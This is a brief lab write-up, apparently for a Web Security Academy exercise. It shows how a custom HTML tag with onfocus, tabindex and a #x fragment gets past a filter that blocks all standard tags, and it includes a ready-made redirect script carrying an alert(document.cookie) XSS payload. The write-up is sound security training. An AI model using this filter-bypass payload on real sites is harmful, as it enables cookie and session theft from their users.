In this lab, all tags are blocked, and we have to create a new tag.
We will create a new tag with id “x” with an event “onfocus” to trigger the alert() function. Then, we use a hash (#) to focus on this element. We use tabindex attribute to specify the tab order of the “x” element.
<script>
location = 'https://lab-id.web-security-academy.net/?search=%3Cniek+id=x+onfocus=alert(document.cookie)+tabindex=1%3E#x';
</script>You need to change lab-id.
ethan 